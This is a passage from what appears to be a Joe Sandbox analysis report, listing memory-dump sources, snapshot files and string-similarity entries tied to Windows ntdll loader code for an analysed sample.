                                        • minkernel\ntdll\ldrinit.c, xrefs: 32979F2E
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                        • API String ID: 3446177414-161242083
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0$Flst
                                        • API String ID: 0-758220159